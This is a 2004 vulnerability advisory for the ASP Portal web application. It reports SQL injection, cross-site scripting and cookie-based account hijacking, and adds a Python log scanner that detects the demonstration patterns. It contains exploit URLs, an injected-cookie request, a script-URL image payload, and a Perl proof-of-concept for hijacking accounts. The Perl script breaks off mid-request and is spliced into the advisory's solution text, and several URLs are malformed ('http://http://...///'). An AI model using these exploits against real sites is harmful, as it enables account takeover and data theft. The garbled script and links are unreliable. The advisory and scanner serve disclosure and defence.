Category: Application (Forum/Board/Portal) > ASP Portal
Vendors: ASP Portal
ASP Portal Has Multiple Flaws That Let Remote Users Hijack Accounts, Inject SQL Commands, and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1009050
SecurityTracker URL: http://http://www.zjjv.com///id/1009050
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Feb 14 2004
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available: Yes
Vendor Confirmed: Yes
Exploit Included: Yes
Description:
Manuel Lopez reported several vulnerabilities in ASP Portal. A remote user can inject SQL commands and can hijack user accounts. A remote user can also conduct cross-site scripting attacks.
It is reported that a remote user can modify the value of their 'thenick' cookie to obtain access to a target user's account, including an administrator's account. A demonstration account hijacking exploit is available in the Source Message.
The report also indicates that the 'index.asp' script does not properly validate user-supplied input in the 'pageid' and 'downloadscat' variables. A remote user can reportedly inject SQL commands to be executed by the database. Some demonstration exploit URLs are provided:
http://[target]/index.asp?inc=blog&pageid='[SqlQuery]
http://[target]/index.asp?inc=downloadssub&downloadscat='[SqlQuery]
It is also reported that a remote user can inject SQL commands via the 'thenick' cookie.
It is also reported that the software does not filter HTML code from user-supplied input before displaying information containing that input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ASP Portal software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
http://[target]/index.asp?inc='>[XSS]
http://[target]/index.asp?inc=profile&searchtext='>[XSS]
http://[target]/index.asp?inc=forumread&article='>[XSS]
It is also reported that a remote user with an account on the system can conduct cross-site scripting attacks by injecting HTML code in place of the image URL ('photograph URL') on the 'details' page.
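As an added example (not code from the advisory, the reporter or the vendor), the following scanner flags the demonstration patterns above in IIS W3C log lines: a quote opening 'pageid' or 'downloadscat', a "'>" or tag in 'inc', 'searchtext' or 'article', and a quote in the 'thenick' cookie. The field order and the sample lines are constructed assumptions; a plain account hijack that sets 'thenick' to a valid nickname is indistinguishable from a normal request and is only addressed by the vendor's fix.

```python
import re
from urllib.parse import parse_qs, unquote

# Parameters named in the advisory and the flaw class each one is tied to.
SQLI_PARAMS = {"pageid", "downloadscat"}
XSS_PARAMS = {"inc", "searchtext", "article"}
# Signatures of the demonstration URLs: a leading quote (pageid='[SqlQuery])
# for SQL injection, "'>" or an opening tag (inc='>[XSS]) for cross-site scripting.
QUOTE_LEAD = re.compile(r"^\s*'")
XSS_HINT = re.compile(r"'\s*>|<\s*/?\s*[a-z]", re.IGNORECASE)

# Constructed IIS W3C-style excerpt (not from the advisory); assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Cookie)
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Cookie)
2004-02-14 06:21:11 10.0.0.5 GET /index.asp inc=blog&pageid=12 200 thenick=alice
2004-02-14 06:21:12 10.0.0.9 GET /index.asp inc=blog&pageid=%27[SqlQuery] 500 thenick=alice
2004-02-14 06:21:13 10.0.0.9 GET /index.asp inc=profile&searchtext=%27%3E%3Cscript%3E 200 -
2004-02-14 06:21:14 10.0.0.9 GET /index.asp inc=downloadssub&downloadscat=%27[SqlQuery] 500 -
2004-02-14 06:21:15 10.0.0.9 GET /index.asp - 200 thenick=%27[SqlQuery]
2004-02-14 06:21:16 10.0.0.5 GET /index.asp inc=forumread&article=42 200 thenick=alice
"""

def scan_line(line):
    """Return (flaw_class, field, decoded_value) tuples for one log line."""
    hits = []
    fields = line.split()
    if not fields or fields[0].startswith("#") or len(fields) < 8:
        return hits
    stem, query, cookie = fields[4], fields[5], fields[7]
    if stem.lower().endswith("/index.asp") and query != "-":
        # parse_qs percent-decodes, so %27 becomes the quote the signatures test for.
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if name in SQLI_PARAMS and QUOTE_LEAD.match(value):
                    hits.append(("sqli", name, value))
                elif name in XSS_PARAMS and XSS_HINT.search(value):
                    hits.append(("xss", name, value))
    if cookie != "-":
        # IIS writes "; " between cookies as ";+"; test the decoded value for a quote.
        for pair in cookie.split(";"):
            key, _, raw = pair.strip("+ ").partition("=")
            if key == "thenick" and "'" in unquote(raw):
                hits.append(("cookie-sqli", key, unquote(raw)))
    return hits

def scan_log(text):
    """Scan a whole log, returning (line_number, flaw_class, field, value) tuples."""
    return [(n,) + hit for n, line in enumerate(text.splitlines(), start=1)
            for hit in scan_line(line)]
```

Running scan_log(SAMPLE_LOG) flags lines 3 to 6 and leaves the two ordinary requests alone.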
Impact:
A remote user can hijack a target user's account.
A remote user can inject SQL commands to be executed by the database.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ASP Portal software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:
The vendor has reportedly issued a fixed version.
Also, the January patch is available at:
http://http://www.zjjv.com///downloadsviewer.asp?theurl=38
Vendor URL: http://www.zjjv.com// (Links to External Site)
Cause:
Authentication error, Input validation error
Underlying OS:
Windows (Any)
Message History:
None.
Source Message Contents
Date: Sat, 14 Feb 2004 06:21:11 +0100
Subject: ASP Portal Multiple Vulnerabilities
Title: ASP Portal Multiple Vulnerabilities
By: Manuel López
Software: Asp Portal
Vendor Description:
ASP Portal is an ASP powered portal site which uses an Access database to store all the site info. The script also includes an easy to use Admin Interface, so you can change everything you need to online, which makes maintaining the site very easy.
Severity:
Moderately critical
Impact:
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, ID Spoofing.
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Description:
---- Cross-Site Scripting ----
This product is vulnerable to a Cross-Site Scripting vulnerability that would allow attackers to inject HTML and script code into the pages and execute it in the client's browser.
http://localhost/index.asp?inc='>[XSS]
http://localhost/index.asp?inc=profile&searchtext='>[XSS]
http://localhost/index.asp?inc=forumread&article='>[XSS]
---- Image ScriptCode Injection ----
An attacker can inject arbitrary HTML or script code instead of an image in the "photograph URL" of a user's 'details' page.
javascript:alert()
---- Sql Injection ----
Another sanitation problem could let an attacker inject SQL code to manipulate and disclose various information from the database. The problem is in the fields 'pageid' and 'downloadscat'.
http://localhost/index.asp?inc=blog&pageid='[SqlQuery]
http://localhost/index.asp?inc=downloadssub&downloadscat='[SqlQuery]
SQL injection is also possible in the cookie, in the 'thenick' field.
GET http://localhost/index.asp HTTP/1.1
Cookie: thenick='[SqlQuery]
---- Cookie Account Hijack ----
It is possible to impersonate others by manipulating the 'thenick' parameter in the cookie. By modifying the cookie it is possible to gain access to another account. This issue can be exploited to gain an administrative account with the service.
---- PROOF OF CONCEPT COOKIE ACCOUNT HIJACK ----
#!/usr/bin/perl -w
## PROOF OF CONCEPT COOKIE ACCOUNT HIJACK
## Example: Asp-POC.pl localhost portal/index.asp Admin respuesta.htm
use IO::Socket;
if (@ARGV < 4)
{
print "\n\n";
print " ____________________________________________________________ \n";
print "| |\n";
print "| PROOF OF CONCEPT COOKIE ACCOUNT HIJACK |\n";
print "| Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
print "| |\n";
print "| By: Manuel López #IST |\n";
print "|____________________________________________________________|\n";
print "\n\n";
exit(1);
}
$host = $ARGV[0];
$directorio = $ARGV[1];
$usuario = $ARGV[2];
$fichero = $ARGV[3];
print "\n";
print "----- Conectando <----\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conectado\n";
print "====> Enviando Datos\n";
$socket->print(<<taqui) or die "write: $!";
GET http://http://www.zjjv.com///downloadsviewer.asp?theurl=38 or buy the new
version.
---- Credits ----
Manuel López ( mantra@gulo.org ) #IST
Special Thanks: -- Aklis -- gulo.org
Kein, Skool, TheChakal, vientoS, |RDR|, NSR500, ^SaRgE^ .. and all the #IST staff.
Excuse me for speaking English so badly.